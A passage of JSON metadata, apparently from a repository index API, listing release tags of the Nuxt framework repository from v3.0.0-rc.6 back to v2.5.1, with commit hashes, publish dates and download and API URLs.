tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt